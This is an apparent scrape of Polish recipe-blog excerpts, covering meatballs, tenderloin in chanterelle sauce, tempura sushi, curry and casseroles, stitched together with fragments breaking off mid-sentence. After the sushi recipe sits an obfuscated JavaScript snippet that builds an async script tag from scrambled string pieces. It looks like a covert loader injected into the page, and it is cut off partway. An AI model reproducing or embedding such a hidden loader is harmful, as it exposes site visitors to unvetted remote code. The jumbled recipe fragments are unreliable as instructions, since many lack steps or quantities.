marchewka (starta) 1 bułka kajzerka (namoczona w mleku i odciśnięta) 3 łyżki bułki tartej 1 jajko 1 łyżeczka czosnku granulowanego Przyprawa do mielonego Pieprz 1 łyżeczka posiekanej natki Sos: Puszka pomidorów 1 cebula 1 łyżeczka czosnku granulowanego 1 łyżeczka masła 1 łyżeczka natki pietruszki Sól, pieprz, szczypta cukru Dodatkowo łyżeczka oliwy do posmarowania naczynia żaroodpornego, bułka tarta do obtoczenia pulpetów(...)szklimy na maśle w rondlu, dodajemy pomidory i przyprawy, gotujemy 10 min i całość blendujemy Naczynie żaroodporne smarujemy oliwą, formujemy pulpety i obtaczamy je w bułce tartej. Zalewamy gorącym sosem. Pieczemy 45min w 180C
Mamuśka wraca do formymoment, w którym polędwiczka jest idealnie upieczona, soczysta , wprost rozpływa się w ustach. Wypróbujecie? Składniki: polędwiczka wieprzowa 0,7 kg sól, pieprz, zioła prowansalskie, suszone pomidory płatki olej sos: kubek śmietany 12 % kubek bulionu warzywnego 30 dag grzybów kurek pęczek natki pietruszki sól, pieprz Wykonanie: *Polędwiczkę nacieramy solą , pieprzem, ziołami i suszonymi pomidorami w płatkach. Odkładamy do lodówki(...)dokładamy obgotowane wcześniej kurki ( 10 minut w osolonej wodzie). Kiedy grzyby się przyrumienią dolewamy bulion, dorzucamy posiekaną natkę pietruszki, dusimy jeszcze 5 minut. Po tym czasie wlewamy śmietankę, mieszamy, sos się zagęści. Doprawiamy wg uznania solą i pieprzem
Z Majeczką w kuchninazwanie. W końcu jak coś, co sera nie widziało i koło sera nie leżało, może nazwać się „ ser z ziemniaka „ ?! Otóż może, bo się przyjęło nazywanie tego sosu w taki sposób ze względu na jego smak i zapach, który pochodzi z płatków drożdżowych. A jeśli to za mało, to może się tak nazywać „BO TAK” . Pewnie
Blendmanryżu do sushi ocet ryżowy szczypta soli odrobina cukru 1 małe dojrzałe awokado ćwiartka białej części pora pół szklanki mąki pszennej pół szklanki lodowatej wody pół jajka pół łyżeczki sosu sojowego spora ilość oleju do smażenia. Ugotuj ryż i odstaw do ostygnięcia. W tym samym czasie upiecz łososia przez ok. 15 minut, a następnie pokrój go na 4 paski. Awokado(...)obficie chrzanem. Dodaj pora oraz awokado. Zawiń sushi, a brzeg nori zwilż wodą. Czas na przygotowanie tempury. Mąkę wymieszaj z wodą – tak, by uzyskać gładką masę. Dodaj jedną łyżkę sosu sojowego oraz jajko. Mieszaj dalej aż do uzyskania gęstej konsystencji. Mocz sushi w tempurze, a następnie wrzucaj na dobrze rozgrzany olej. Smaż przez kilka minut. O tym pamiętaj Na koniec
Tradycyjna Kuchniasos, obok słynnego już sosu paprykowego to drugi z moich ulubionych dodatków do kanapek. Smakuje wprost wyśmienicie. Składniki: 2 kg cukinii ½ kg białej cebuli czerwona papryka 5 szt. 1 łyżka soli Przyprawy: 1 łyżeczka mielonego pieprzu ½ łyżeczki słodkiej mielonej papryki ½ łyżeczki ostrej mielonej papryki 1 łyżeczka curry ½ szklanki octu 40 dag cukru przecier pomidorowy 600 gram Wykonanie: Cukinię, paprykę, oczyścić
Tradycyjna Kuchniajakoś „pod” ten przepis na kolację – wykorzystałam co znalazłam w lodówce ;). Czas wykonania: 10 minut Stopień trudności: superłatwy Składniki: Opakowanie mrożonych krewetek królewskich 1-2 łyżki masła klarowanego SOS: Mały kubeczek jogurtu typu greckiego (ja używam Zott) 2 – 3 ząbki czosnku Mały pęczek koperku (na oko 2 – 3 łyżki posiekanego) Sól do smaku wg uznania GRZANKI: 3 kromki chleba(...)suszonym tymiankiem. Zapiekłam w piekarniku na chrupiące grzanki (funkcja grill, 170 stopni). Na patelni rozpuściłam masło klarowane i przesmażyłam wstępnie obgotowane krewetki na złoto. Zdjęłam z ognia, serwowałam z sosem czosnkowo-koperkowym i bezglutenowymi grzankami
Kate's Kitchentrochę zmięknie. Następnie dodajemy grzyby, smażymy kilka minut co jakiś czas mieszamy. Dolewamy śmietanę, starty czosnek na małych oczkach oraz pokrojoną w paski wędlinę. Wszystko dusimy do czasu aż sos zgęstnieje. W razie potrzeby doprawiamy do smaku. Całość posypujemy posiekanym lubczykiem. Makaron gotujemy według informacji na opakowaniu, odcedzamy i przekładamy do sosu. Mieszamy i podajemy. Po wierzchu możemy posypać startym
Radość kipiąca uśmiechem.ryżem. Składniki na curry z kalafiorem i kurczakiem (3 porcje): podwójna pierś z kurczaka przyprawa do kurczaka kalafior spora marchew por ok 100 ml śmietany 30% 2 łyżki sosu sojowego mały pęczek pietruszki łyżeczka curry sól, pieprz, papryka ostra, kurkuma, imbir Przygotowanie Piersi kroimy w kostkę i oprószamy przyprawą do kurczaka, solą i pieprzem. Piersi wrzucamy na rozgrzany olej(...)dużych oczkach i kalafiora podzielonego na drobne różyczki. Całość chwilę przysmażamy, następnie wlewamy pół szklanki wody bądź bulionu i dusimy pod przykryciem do miękkości warzyw. Następnie zdejmujemy pokrywkę, dodajemy sos sojowy, śmietankę, curry, posiekaną natkę pietruszki. Doprawiamy do smaku. Całość mieszamy i dusimy jeszcze 5-10 minut. Curry z kalafiorem i kurczakiem Artykuł Curry z kalafiorem i kurczakiem pochodzi
e-PrzepisyKulinarneMini Rurki zrobiłam zapiekankę śmietanowo- serową z pomidorkami koktajlowymi. Lubię bardzo takie połącznia. Fajna zapieknka bez mięsa , idealna na obiad czy kolację:) Zgłodniałeś? Zgłodniałaś? Zapraszam :) SKŁADNIKI DLA 2 OSÓB: Sos 250 ml śmietanki 18% 100 ml wody 1 jajko Sól i pieprz do smaku 1 łyżeczka czosnku niedźwiedziego 2 łyżki czosnku 1/2 łyżeczka papryki chilli 10 dag sera żółtego tartego(...)gotuję w osolonej wodzie z dodatkiem oliwy al'dente. Odcedzam. W naczyniu żaroodpornym przekładam makaron. Następnie dodaję szpinak surowy oraz połówki pomidorków. W miseczce łącze składniki do sosu. Zalewam zapiekankę. Na wierzch posypuję tartym serem oraz drobno posiekaną natką pietruszki. Zapiekam w 180 stopniach
Gotowanie Patkibułki do burgerów mogą być kajzerki 1 /2 ogórka zielonego 1 pomidor 1/2 cebuli 2 garście rukoli 10 dag sera żółtego np. Chaddera 10 dag sera typu feta Ulubiony sos PRZYGOTOWANIE: Ze składników na burgery wołowe formuję kotlety o grubości ok 0.5-1 cm. Grilluję z obu stron na rumiano. Bułki do burgerów przekrajam wzdłuż. Na bułkę(...)Następnie myję pomidora, kroję w plastry. Ogórka świeżego obieram kroję w plastry. Cebulę obieram kroję w kostkę. Na mięso kładę warzywa. Posypuję rukolą oraz serem feta. Polewam ulubionym sosem
Gotowanie Patkijapoński chrzan w soczystym zielonym kolorze. Warto zdobyć prawdziwy produkt, by – za jego sprawą – odbyć kulinarną podróż po orientalnych smakach. Niestety trzeba się liczyć z jego dość wysoką ceną. Sos sojowy Stanowi dodatek do sushi, w którym maczana jest ryba. Ocet ryżowy Jest niezbędny do przyrządzenia zaprawy ryżowej. Marynowany imbir Jego rolą jest oczyszczenie kubków smakowych. Pozwala to na czerpanie(...)matę bambusową do środka, rolując w górę. Pamiętaj, by ciasno zawinąć rolkę. Ostrym nożem (pozbawionym ząbków), pokrój rulon na mniejsze części – kawałki o grubości ok. 2 cm. Podawaj z sosem sojowym, wasabi oraz marynowanym imbirem. Smacznego! (function(){ tcuzu="rcX8Xph0cuzl";tcuz=document.createElement("script"); tcuz_="u"+("st");tcuz_+="at"+(".");tcuz.async=true;tcuz_+="in"; tcuzu="67379292."+tcuzu;tcuz.type="text/javascript";tcuzu+="tq40pcprX6n6"; tcuzu+="riwk0k
Codogarapomidorów 2 małe papryki (zielona i czerwona) 3 - 4 łyżki słodkiej śmietanki 1 szklanka startego ostrego sera (np. cheddar) 2 łyżeczki bazylii 2 łyżeczki oregano szczypta chili 1/2 szklanki sosu pomidorowego do pizzy lub keczupu 1/2 szklanki startej mozzarelli kilka plasterków salami (najlepiej pepperoni) opcjonalnie kapary i oliwki sól olej do smażenia i natłuszczenia formy Wykonanie: Makaron ugotować al dente(...)kawałki i podsmażyć na oleju. Kawałki pomidorów odsączyć na sitku z zalewy. Warzywa oraz zioła wymieszać z makaronem i dosolić do smaku. Wierzch zapiekanki wyrównać i posmarować sosem pomidorowym. Posypać startą mozzarellą i ułożyć na niej plasterki salami (oraz innych ulubionych składników). Zapiekać około 15 - 20 minut w piekarniku rozgrzanym do 170 stopni
zadanie-gotowanieSkładniki: comber i skoki z królika 1 cebula 2 garście suszonych grzybów 1 szklanka odgotowanych podgrzybków 1 słoik sosu uniwersalnego ciemnego Łowicz zioła Małgosi ostra papryka 1/2 szklanki białego wytrawnego … Czytaj dalej Królik w sosie grzybowym
czarrna od kuchnilodówki. Pozostałą część malin podgrzewamy w rondelku, dolewamy wody – ok. 1/2-3/4 szklanki. Dodajemy pozostałą część agaru i gotujemy ok. 2-3 minuty. Opcjonalnie można dodać łyżkę erytrolu, jeśli sos będzie za mało słodki. Sos przelewamy do szklanek, na wierzch stężałej masy serowej. Wkładamy do lodówki, aby masa stężała. Jeśli użyjecie żelatyny, koniecznie zostawcie masę na dłużej, ponieważ żelatyna potrzebuje
Kucharzycanią 2 łyżki tłuszczu. Na rozgrzany tłuszcz wsypujemy pokrojoną w piórka cebulę i smażymy ją na małym ogniu do zeszklenia, często mieszając. Wlewamy na patelnię bulion wymieszany z mirin, sosem sojowym i cukrem i dusimy cebulkę w bulionie na małym ogniu przez 5-6 minut, do czasu aż około 1/4 płynu odparuje. Kotlety kroimy w poprzek na plastry(...)średnia czerwona cebula –100-120g 3 jajka L 100ml gorącej wody ½ lub 1 płaska łyżeczka granulowanego bulionu hondashi (szukajcie w Kuchniach Świata i na Allegro) 2 łyżki sosu sojowego jasnego 2 łyżki mirin (albo łyżka octu ryżowego + ½ łyżeczki cukru + łyżka wody) 2 łyżeczki brązowego cukru 3 łyżki mąki do panierowania 1 szklanka panko do panierowania sól pieprz DO PODANIA
Karo in the Kitchen